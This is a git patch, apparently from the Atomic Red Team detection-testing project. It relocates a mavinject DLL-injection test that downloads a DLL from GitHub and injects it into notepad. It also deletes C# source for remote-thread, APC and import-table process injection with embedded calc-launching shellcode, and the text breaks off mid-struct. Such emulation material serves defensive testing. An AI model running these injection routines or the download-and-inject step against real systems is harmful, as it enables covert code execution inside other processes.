From 80415a586f1aa857de8b9945029463c18806458e Mon Sep 17 00:00:00 2001 From: Matt Graeber <60448025+mgraeber-rc@users.noreply.github.com> Date: Sat, 13 Mar 2021 09:22:36 -0500 Subject: [PATCH 3/7] Moving mavinject test to T1055.001 and src cleanup #1404 (#1405) * Moving mavinject test to T1055.001 and src cleanup #1404 * Adding Windows Command Prompt test * Adding rundll32.exe test Co-authored-by: Carrie Roberts --- atomics/T1055.001/T1055.001.yaml | 36 + .../T1055.cpp => T1055.001/src/T1055.001.cpp} | 0 .../src/Win32/T1055.001.dll} | Bin .../src/x64/T1055.001.dll} | Bin atomics/T1055/T1055.yaml | 33 - atomics/T1055/src/Linux/T1055.c | 22 - atomics/T1055/src/T1055.cs | 1147 ----------------- atomics/T1055/src/x64/T1055-macrocode.txt | 0 atomics/T1059.003/T1059.003.yaml | 20 + atomics/T1218.011/T1218.011.yaml | 15 + 10 files changed, 71 insertions(+), 1202 deletions(-) create mode 100644 atomics/T1055.001/T1055.001.yaml rename atomics/{T1055/src/T1055.cpp => T1055.001/src/T1055.001.cpp} (100%) rename atomics/{T1055/src/Win32/T1055.dll => T1055.001/src/Win32/T1055.001.dll} (100%) rename atomics/{T1055/src/x64/T1055.dll => T1055.001/src/x64/T1055.001.dll} (100%) delete mode 100644 atomics/T1055/src/Linux/T1055.c delete mode 100644 atomics/T1055/src/T1055.cs mode change 100644 => 100755 atomics/T1055/src/x64/T1055-macrocode.txt diff --git a/atomics/T1055.001/T1055.001.yaml b/atomics/T1055.001/T1055.001.yaml new file mode 100644 index 0000000000..d04863bbf9 --- /dev/null +++ b/atomics/T1055.001/T1055.001.yaml @@ -0,0 +1,36 @@ +attack_technique: T1055.001 +display_name: 'Process Injection: Dynamic-link Library Injection' +atomic_tests: +- name: Process Injection via mavinject.exe + auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254 + description: | + Windows 10 Utility To Inject DLLS. + + Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll. + With default arguments, expect to see a MessageBox, with notepad's icon in taskbar. + supported_platforms: + - windows + input_arguments: + process_id: + description: PID of input_arguments + type: Integer + default: (Start-Process notepad -PassThru).id + dll_payload: + description: DLL to Inject + type: Path + default: PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll + dependency_executor_name: powershell + dependencies: + - description: | + Utility to inject must exist on disk at specified location (#{dll_payload}) + prereq_command: | + if (Test-Path #{dll_payload}) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" + executor: + command: | + $mypid = #{process_id} + mavinject $mypid /INJECTRUNNING #{dll_payload} + name: powershell + elevation_required: true diff --git a/atomics/T1055/src/T1055.cpp b/atomics/T1055.001/src/T1055.001.cpp similarity index 100% rename from atomics/T1055/src/T1055.cpp rename to atomics/T1055.001/src/T1055.001.cpp diff --git a/atomics/T1055/src/Win32/T1055.dll b/atomics/T1055.001/src/Win32/T1055.001.dll similarity index 100% rename from atomics/T1055/src/Win32/T1055.dll rename to atomics/T1055.001/src/Win32/T1055.001.dll diff --git a/atomics/T1055/src/x64/T1055.dll b/atomics/T1055.001/src/x64/T1055.001.dll similarity index 100% rename from atomics/T1055/src/x64/T1055.dll rename to atomics/T1055.001/src/x64/T1055.001.dll diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml index 4a318d4655..9e6790ce47 100644 --- a/atomics/T1055/T1055.yaml +++ b/atomics/T1055/T1055.yaml @@ -1,39 +1,6 @@ attack_technique: T1055 display_name: Process Injection atomic_tests: -- name: Process Injection via mavinject.exe - auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254 - description: | - Windows 10 Utility To Inject DLLS. - - Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll. - With default arguments, expect to see a MessageBox, with notepad's icon in taskbar. - supported_platforms: - - windows - input_arguments: - process_id: - description: PID of input_arguments - type: Integer - default: (Start-Process notepad -PassThru).id - dll_payload: - description: DLL to Inject - type: Path - default: PathToAtomicsFolder\T1055\src\x64\T1055.dll - dependency_executor_name: powershell - dependencies: - - description: | - Utility to inject must exist on disk at specified location (#{dll_payload}) - prereq_command: | - if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - get_prereq_command: | - New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll" -OutFile "#{dll_payload}" - executor: - command: | - $mypid = #{process_id} - mavinject $mypid /INJECTRUNNING #{dll_payload} - name: powershell - elevation_required: true - name: Shellcode execution via VBA auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048 description: | diff --git a/atomics/T1055/src/Linux/T1055.c b/atomics/T1055/src/Linux/T1055.c deleted file mode 100644 index 6986239047..0000000000 --- a/atomics/T1055/src/Linux/T1055.c +++ /dev/null @@ -1,22 +0,0 @@ -/* - Atomic Red Team Shared Object Library - Uses code inspired by Zombie Ant Farm (https://github.com/dsnezhkov/zombieant) - - Compilation - ------------- - gcc -shared -fPIC -o ../bin/T1055.so T1055.c -*/ - -#include - -static void init(int argc, char **argv, char **envp) { - printf("Loaded Atomic Red Team Library successfully!\n"); -} - -static void fini(void) { - printf("Unloading Atomic Red Team preload...\n"); -} - - -__attribute__((section(".init_array"), used)) static typeof(init) *init_p = init; -__attribute__((section(".fini_array"), used)) static typeof(fini) *fini_p = fini; \ No newline at end of file diff --git a/atomics/T1055/src/T1055.cs b/atomics/T1055/src/T1055.cs deleted file mode 100644 index 9f43822f8f..0000000000 --- a/atomics/T1055/src/T1055.cs +++ /dev/null @@ -1,1147 +0,0 @@ -//Atomic Process Injection Tests -//xref: https://github.com/pwndizzle/c-sharp-memory-injection - -// https://github.com/peterferrie/win-exec-calc-shellcode - -// To run: -// 1. Compile code - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:..\bin\T1055.exe T1055.cs -// - - - -using System; -using System.Reflection; -using System.Diagnostics; -using System.Runtime.InteropServices; -using System.IO; -using System.IO.Compression; -using System.Collections.Generic; -using System.ComponentModel; -using System.Text; - -public class ProcessInject -{ - [DllImport("kernel32.dll")] - public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId); - - [DllImport("kernel32.dll", CharSet = CharSet.Auto)] - public static extern IntPtr GetModuleHandle(string lpModuleName); - - [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] - static extern IntPtr GetProcAddress(IntPtr hModule, string procName); - - [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] - static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,uint dwSize, uint flAllocationType, uint flProtect); - - [DllImport("kernel32.dll", SetLastError = true)] - static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten); - - [DllImport("kernel32.dll")] - static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int dwSize, ref int lpNumberOfBytesRead); - - [DllImport("kernel32.dll")] - static extern IntPtr CreateRemoteThread(IntPtr hProcess, - IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); - - // privileges - const int PROCESS_CREATE_THREAD = 0x0002; - const int PROCESS_QUERY_INFORMATION = 0x0400; - const int PROCESS_VM_OPERATION = 0x0008; - const int PROCESS_VM_WRITE = 0x0020; - const int PROCESS_VM_READ = 0x0010; - - // used for memory allocation - const uint MEM_COMMIT = 0x00001000; - const uint MEM_RESERVE = 0x00002000; - const uint PAGE_READWRITE = 4; - - public static int Inject() - { - - // Get process id - Console.WriteLine("Get process by name..."); - System.Diagnostics.Process.Start("notepad"); - Process targetProcess = Process.GetProcessesByName("notepad")[0]; - - - // Get handle of the process - with required privileges - - IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id); - - - // Get address of LoadLibraryA and store in a pointer - - IntPtr loadLibraryAddr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); - - - // Path to dll that will be injected - string dllName = @"C:\AtomicRedTeam\atomics\T1055\bin\w64-exec-calc-shellcode.dll"; - - // Allocate memory for dll path and store pointer - - IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); - - - // Write path of dll to memory - - UIntPtr bytesWritten; - bool resp1 = WriteProcessMemory(procHandle, allocMemAddress, System.Text.Encoding.Default.GetBytes(dllName), (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten); - - // Read contents of memory - int bytesRead = 0; - byte[] buffer = new byte[24]; - - ReadProcessMemory(procHandle, allocMemAddress, buffer, buffer.Length, ref bytesRead); - Console.WriteLine("Data in memory: " + System.Text.Encoding.UTF8.GetString(buffer)); - - // Create a thread that will call LoadLibraryA with allocMemAddress as argument - - CreateRemoteThread(procHandle, IntPtr.Zero, 0, loadLibraryAddr, allocMemAddress, 0, IntPtr.Zero); - - return 0; - } -} - -public class ApcInjectionAnyProcess -{ - public static void Inject() - { - - byte[] shellcode = new byte[112] { - 0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58,0xc3 - }; - - // Open process. "explorer" is a good target due to the large number of threads which will enter alertable state - Process targetProcess = Process.GetProcessesByName("notepad")[0]; - IntPtr procHandle = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id); - - // Allocate memory within process and write shellcode - IntPtr resultPtr = VirtualAllocEx(procHandle, IntPtr.Zero, shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE); - IntPtr bytesWritten = IntPtr.Zero; - bool resultBool = WriteProcessMemory(procHandle,resultPtr,shellcode,shellcode.Length, out bytesWritten); - - // Modify memory permissions on shellcode from XRW to XR - uint oldProtect = 0; - resultBool = VirtualProtectEx(procHandle, resultPtr, shellcode.Length, PAGE_EXECUTE_READ, out oldProtect); - - // Iterate over threads and queueapc - foreach (ProcessThread thread in targetProcess.Threads) - { - //Get handle to thread - IntPtr tHandle = OpenThread(ThreadAccess.THREAD_HIJACK, false, (int)thread.Id); - - //Assign APC to thread to execute shellcode - IntPtr ptr = QueueUserAPC(resultPtr, tHandle, IntPtr.Zero); - } - } - - // Memory permissions - private static UInt32 MEM_COMMIT = 0x1000; - private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; - //private static UInt32 PAGE_READWRITE = 0x04; - private static UInt32 PAGE_EXECUTE_READ = 0x20; - - // Process privileges - const int PROCESS_CREATE_THREAD = 0x0002; - const int PROCESS_QUERY_INFORMATION = 0x0400; - const int PROCESS_VM_OPERATION = 0x0008; - const int PROCESS_VM_WRITE = 0x0020; - const int PROCESS_VM_READ = 0x0010; - - [Flags] - public enum ThreadAccess : int - { - TERMINATE = (0x0001), - SUSPEND_RESUME = (0x0002), - GET_CONTEXT = (0x0008), - SET_CONTEXT = (0x0010), - SET_INFORMATION = (0x0020), - QUERY_INFORMATION = (0x0040), - SET_THREAD_TOKEN = (0x0080), - IMPERSONATE = (0x0100), - DIRECT_IMPERSONATION = (0x0200), - THREAD_HIJACK = SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT, - THREAD_ALL = TERMINATE | SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT | SET_INFORMATION | QUERY_INFORMATION | SET_THREAD_TOKEN | IMPERSONATE | DIRECT_IMPERSONATION - } - - [DllImport("kernel32.dll", SetLastError = true)] - public static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle, - int dwThreadId); - - [DllImport("kernel32.dll",SetLastError = true)] - public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out IntPtr lpNumberOfBytesWritten); - - [DllImport("kernel32.dll")] - public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData); - - [DllImport("kernel32")] - public static extern IntPtr VirtualAlloc(UInt32 lpStartAddr, - Int32 size, UInt32 flAllocationType, UInt32 flProtect); - - [DllImport("kernel32.dll", SetLastError = true )] - public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, - Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect); - - [DllImport("kernel32.dll", SetLastError = true)] - public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId); - - [DllImport("kernel32.dll")] - public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, - int dwSize, uint flNewProtect, out uint lpflOldProtect); -} - -public class ApcInjectionNewProcess -{ - public static void Inject() - { - - byte[] shellcode = new byte[112] { - 0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58,0xc3 - }; - - // Target process to inject into - string processpath = @"C:\Windows\notepad.exe"; - STARTUPINFO si = new STARTUPINFO(); - PROCESS_INFORMATION pi = new PROCESS_INFORMATION(); - - // Create new process in suspended state to inject into - bool success = CreateProcess(processpath, null, - IntPtr.Zero, IntPtr.Zero, false, - ProcessCreationFlags.CREATE_SUSPENDED, - IntPtr.Zero, null, ref si, out pi); - - // Allocate memory within process and write shellcode - IntPtr resultPtr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, shellcode.Length,MEM_COMMIT, PAGE_READWRITE); - IntPtr bytesWritten = IntPtr.Zero; - bool resultBool = WriteProcessMemory(pi.hProcess,resultPtr,shellcode,shellcode.Length, out bytesWritten); - - // Open thread - IntPtr sht = OpenThread(ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId); - uint oldProtect = 0; - - // Modify memory permissions on allocated shellcode - resultBool = VirtualProtectEx(pi.hProcess,resultPtr, shellcode.Length,PAGE_EXECUTE_READ, out oldProtect); - - // Assign address of shellcode to the target thread apc queue - IntPtr ptr = QueueUserAPC(resultPtr,sht,IntPtr.Zero); - - IntPtr ThreadHandle = pi.hThread; - ResumeThread(ThreadHandle); - - } - - - private static UInt32 MEM_COMMIT = 0x1000; - - //private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; //I'm not using this #DFIR ;-) - private static UInt32 PAGE_READWRITE = 0x04; - private static UInt32 PAGE_EXECUTE_READ = 0x20; - - - [Flags] - public enum ProcessAccessFlags : uint - { - All = 0x001F0FFF, - Terminate = 0x00000001, - CreateThread = 0x00000002, - VirtualMemoryOperation = 0x00000008, - VirtualMemoryRead = 0x00000010, - VirtualMemoryWrite = 0x00000020, - DuplicateHandle = 0x00000040, - CreateProcess = 0x000000080, - SetQuota = 0x00000100, - SetInformation = 0x00000200, - QueryInformation = 0x00000400, - QueryLimitedInformation = 0x00001000, - Synchronize = 0x00100000 - } - - [Flags] - public enum ProcessCreationFlags : uint - { - ZERO_FLAG = 0x00000000, - CREATE_BREAKAWAY_FROM_JOB = 0x01000000, - CREATE_DEFAULT_ERROR_MODE = 0x04000000, - CREATE_NEW_CONSOLE = 0x00000010, - CREATE_NEW_PROCESS_GROUP = 0x00000200, - CREATE_NO_WINDOW = 0x08000000, - CREATE_PROTECTED_PROCESS = 0x00040000, - CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000, - CREATE_SEPARATE_WOW_VDM = 0x00001000, - CREATE_SHARED_WOW_VDM = 0x00001000, - CREATE_SUSPENDED = 0x00000004, - CREATE_UNICODE_ENVIRONMENT = 0x00000400, - DEBUG_ONLY_THIS_PROCESS = 0x00000002, - DEBUG_PROCESS = 0x00000001, - DETACHED_PROCESS = 0x00000008, - EXTENDED_STARTUPINFO_PRESENT = 0x00080000, - INHERIT_PARENT_AFFINITY = 0x00010000 - } - public struct PROCESS_INFORMATION - { - public IntPtr hProcess; - public IntPtr hThread; - public uint dwProcessId; - public uint dwThreadId; - } - public struct STARTUPINFO - { - public uint cb; - public string lpReserved; - public string lpDesktop; - public string lpTitle; - public uint dwX; - public uint dwY; - public uint dwXSize; - public uint dwYSize; - public uint dwXCountChars; - public uint dwYCountChars; - public uint dwFillAttribute; - public uint dwFlags; - public short wShowWindow; - public short cbReserved2; - public IntPtr lpReserved2; - public IntPtr hStdInput; - public IntPtr hStdOutput; - public IntPtr hStdError; - } - - [Flags] - public enum ThreadAccess : int - { - TERMINATE = (0x0001) , - SUSPEND_RESUME = (0x0002) , - GET_CONTEXT = (0x0008) , - SET_CONTEXT = (0x0010) , - SET_INFORMATION = (0x0020) , - QUERY_INFORMATION = (0x0040) , - SET_THREAD_TOKEN = (0x0080) , - IMPERSONATE = (0x0100) , - DIRECT_IMPERSONATION = (0x0200) - } - - [DllImport("kernel32.dll", SetLastError = true)] - public static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle, - int dwThreadId); - - [DllImport("kernel32.dll",SetLastError = true)] - public static extern bool WriteProcessMemory( - IntPtr hProcess, - IntPtr lpBaseAddress, - byte[] lpBuffer, - int nSize, - out IntPtr lpNumberOfBytesWritten); - - [DllImport("kernel32.dll")] - public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData); - - [DllImport("kernel32")] - public static extern IntPtr VirtualAlloc(UInt32 lpStartAddr, - Int32 size, UInt32 flAllocationType, UInt32 flProtect); - [DllImport("kernel32.dll", SetLastError = true )] - public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, - Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect); - - [DllImport("kernel32.dll", SetLastError = true)] - public static extern IntPtr OpenProcess( - ProcessAccessFlags processAccess, - bool bInheritHandle, - int processId - ); - - - [DllImport("kernel32.dll")] - public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes,bool bInheritHandles, ProcessCreationFlags dwCreationFlags, IntPtr lpEnvironment,string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation); - [DllImport("kernel32.dll")] - public static extern uint ResumeThread(IntPtr hThread); - [DllImport("kernel32.dll")] - public static extern uint SuspendThread(IntPtr hThread); - [DllImport("kernel32.dll")] - public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, - int dwSize, uint flNewProtect, out uint lpflOldProtect); -} - -public class IatInjection -{ - - public static void Inject() - { - string targetProcName = "notepad"; - string targetFuncName = "CreateFileW"; - - // Get target process id and read memory contents - Process process = Process.GetProcessesByName(targetProcName)[0]; - IntPtr hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, process.Id); - int bytesRead = 0; - byte[] fileBytes = new byte[process.WorkingSet64]; - ReadProcessMemory(hProcess, process.MainModule.BaseAddress, fileBytes, fileBytes.Length, ref bytesRead); - - // The DOS header - IMAGE_DOS_HEADER dosHeader; - - // The file header - IMAGE_FILE_HEADER fileHeader; - - // Optional 32 bit file header - IMAGE_OPTIONAL_HEADER32 optionalHeader32 = new IMAGE_OPTIONAL_HEADER32(); - - // Optional 64 bit file header - IMAGE_OPTIONAL_HEADER64 optionalHeader64 = new IMAGE_OPTIONAL_HEADER64(); - - // Image Section headers - IMAGE_SECTION_HEADER[] imageSectionHeaders; - - // Import descriptor for each DLL - IMAGE_IMPORT_DESCRIPTOR[] importDescriptors; - - // Convert file bytes to memorystream and use reader - MemoryStream stream = new MemoryStream(fileBytes, 0, fileBytes.Length); - BinaryReader reader = new BinaryReader(stream); - - //Begin parsing structures - dosHeader = FromBinaryReader(reader); - - // Add 4 bytes to the offset - stream.Seek(dosHeader.e_lfanew, SeekOrigin.Begin); - - UInt32 ntHeadersSignature = reader.ReadUInt32(); - fileHeader = FromBinaryReader(reader); - if (Is32BitHeader(fileHeader)) - { - optionalHeader32 = FromBinaryReader(reader); - } - else - { - optionalHeader64 = FromBinaryReader(reader); - } - - imageSectionHeaders = new IMAGE_SECTION_HEADER[fileHeader.NumberOfSections]; - for (int headerNo = 0; headerNo < imageSectionHeaders.Length; ++headerNo) - { - imageSectionHeaders[headerNo] = FromBinaryReader(reader); - } - - // Go to ImportTable and parse every imported DLL - stream.Seek((long)((ulong)optionalHeader64.ImportTable.VirtualAddress), SeekOrigin.Begin); - importDescriptors = new IMAGE_IMPORT_DESCRIPTOR[50]; - - for (int i = 0; i < 50; i++) - { - importDescriptors[i] = FromBinaryReader(reader); - } - bool flag = false; - int j = 0; - - // The below is really hacky, would have been better to use structures! - while (j < importDescriptors.Length && !flag) - { - for (int k = 0; k < 1000; k++) - { - // Get the address for the function and its name - - stream.Seek(importDescriptors[j].OriginalFirstThunk + (k * 8), SeekOrigin.Begin); - - long nameOffset = reader.ReadInt64(); - if (nameOffset > 1000000 || nameOffset < 0) - { - break; - } - - // Get the function name - stream.Seek(nameOffset + 2, SeekOrigin.Begin); - List list = new List(); - byte[] array; - do - { - array = reader.ReadBytes(1); - list.Add(Encoding.Default.GetString(array)); - } - while (array[0] != 0); - string curFuncName = string.Join(string.Empty, list.ToArray()); - curFuncName = curFuncName.Substring(0, curFuncName.Length - 1); - - // Get the offset of the pointer to the target function and its current value - long funcOffset = importDescriptors[j].FirstThunk + (k * 8); - stream.Seek(funcOffset, SeekOrigin.Begin); - long curFuncAddr = reader.ReadInt64(); - - // Found target function, modify address to point to shellcode - if (curFuncName == targetFuncName) - { - - // WinExec shellcode from: https://github.com/peterferrie/win-exec-calc-shellcode - // nasm w64-exec-calc-shellcode.asm -DSTACK_ALIGN=TRUE -DFUNC=TRUE -DCLEAN=TRUE -o w64-exec-calc-shellcode.bin - byte[] payload = new byte[111] { - 0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58 - }; - - // Once shellcode has executed go to real import (mov to rax then jmp to address) - byte[] mov_rax = new byte[2] { - 0x48, 0xb8 - }; - byte[] jmp_address = BitConverter.GetBytes(curFuncAddr); - byte[] jmp_rax = new byte[2] { - 0xff, 0xe0 - }; - - // Build shellcode - byte[] shellcode = new byte[payload.Length + mov_rax.Length + jmp_address.Length + jmp_rax.Length]; - payload.CopyTo(shellcode, 0); - mov_rax.CopyTo(shellcode, payload.Length); - jmp_address.CopyTo(shellcode, payload.Length+mov_rax.Length); - jmp_rax.CopyTo(shellcode, payload.Length+mov_rax.Length+jmp_address.Length); - - // Allocate memory for shellcode - IntPtr shellcodeAddress = VirtualAllocEx(hProcess, IntPtr.Zero, shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE); - - // Write shellcode to memory - IntPtr shellcodeBytesWritten = IntPtr.Zero; - WriteProcessMemory(hProcess,shellcodeAddress,shellcode,shellcode.Length, out shellcodeBytesWritten); - - long funcAddress = (long)optionalHeader64.ImageBase + funcOffset; - - // Get current value of IAT - bytesRead = 0; - byte[] buffer1 = new byte[8]; - ReadProcessMemory(hProcess, (IntPtr)funcAddress, buffer1, buffer1.Length, ref bytesRead); - - // Get shellcode address - byte[] shellcodePtr = BitConverter.GetBytes((Int64)shellcodeAddress); - - // Modify permissions to allow IAT modification - uint oldProtect = 0; - bool protectbool = VirtualProtectEx(hProcess, (IntPtr)funcAddress, shellcodePtr.Length, PAGE_EXECUTE_READWRITE, out oldProtect); - - // Modfiy IAT to point to shellcode - IntPtr iatBytesWritten = IntPtr.Zero; - bool success = WriteProcessMemory(hProcess, (IntPtr)funcAddress, shellcodePtr, shellcodePtr.Length, out iatBytesWritten); - - // Read IAT to confirm new value - bytesRead = 0; - byte[] buffer = new byte[8]; - ReadProcessMemory(hProcess, (IntPtr)funcAddress, buffer, buffer.Length, ref bytesRead); - - - flag = true; - break; - } - } - j++; - } - } - - - public struct IMAGE_DOS_HEADER - { // DOS .EXE header - public UInt16 e_magic; // Magic number - public UInt16 e_cblp; // Bytes on last page of file - public UInt16 e_cp; // Pages in file - public UInt16 e_crlc; // Relocations - public UInt16 e_cparhdr; // Size of header in paragraphs - public UInt16 e_minalloc; // Minimum extra paragraphs needed - public UInt16 e_maxalloc; // Maximum extra paragraphs needed - public UInt16 e_ss; // Initial (relative) SS value - public UInt16 e_sp; // Initial SP value - public UInt16 e_csum; // Checksum - public UInt16 e_ip; // Initial IP value - public UInt16 e_cs; // Initial (relative) CS value - public UInt16 e_lfarlc; // File address of relocation table - public UInt16 e_ovno; // Overlay number - public UInt16 e_res_0; // Reserved words - public UInt16 e_res_1; // Reserved words - public UInt16 e_res_2; // Reserved words - public UInt16 e_res_3; // Reserved words - public UInt16 e_oemid; // OEM identifier (for e_oeminfo) - public UInt16 e_oeminfo; // OEM information; e_oemid specific - public UInt16 e_res2_0; // Reserved words - public UInt16 e_res2_1; // Reserved words - public UInt16 e_res2_2; // Reserved words - public UInt16 e_res2_3; // Reserved words - public UInt16 e_res2_4; // Reserved words - public UInt16 e_res2_5; // Reserved words - public UInt16 e_res2_6; // Reserved words - public UInt16 e_res2_7; // Reserved words - public UInt16 e_res2_8; // Reserved words - public UInt16 e_res2_9; // Reserved words - public UInt32 e_lfanew; // File address of new exe header - } - - [StructLayout(LayoutKind.Sequential)] - public struct IMAGE_DATA_DIRECTORY - { - public UInt32 VirtualAddress; - public UInt32 Size; - } - - [StructLayout(LayoutKind.Sequential, Pack = 1)] - public struct IMAGE_OPTIONAL_HEADER32 - { - public UInt16 Magic; - public Byte MajorLinkerVersion; - public Byte MinorLinkerVersion; - public UInt32 SizeOfCode; - public UInt32 SizeOfInitializedData; - public UInt32 SizeOfUninitializedData; - public UInt32 AddressOfEntryPoint; - public UInt32 BaseOfCode; - public UInt32 BaseOfData; - public UInt32 ImageBase; - public UInt32 SectionAlignment; - public UInt32 FileAlignment; - public UInt16 MajorOperatingSystemVersion; - public UInt16 MinorOperatingSystemVersion; - public UInt16 MajorImageVersion; - public UInt16 MinorImageVersion; - public UInt16 MajorSubsystemVersion; - public UInt16 MinorSubsystemVersion; - public UInt32 Win32VersionValue; - public UInt32 SizeOfImage; - public UInt32 SizeOfHeaders; - public UInt32 CheckSum; - public UInt16 Subsystem; - public UInt16 DllCharacteristics; - public UInt32 SizeOfStackReserve; - public UInt32 SizeOfStackCommit; - public UInt32 SizeOfHeapReserve; - public UInt32 SizeOfHeapCommit; - public UInt32 LoaderFlags; - public UInt32 NumberOfRvaAndSizes; - - public IMAGE_DATA_DIRECTORY ExportTable; - public IMAGE_DATA_DIRECTORY ImportTable; - public IMAGE_DATA_DIRECTORY ResourceTable; - public IMAGE_DATA_DIRECTORY ExceptionTable; - public IMAGE_DATA_DIRECTORY CertificateTable; - public IMAGE_DATA_DIRECTORY BaseRelocationTable; - public IMAGE_DATA_DIRECTORY Debug; - public IMAGE_DATA_DIRECTORY 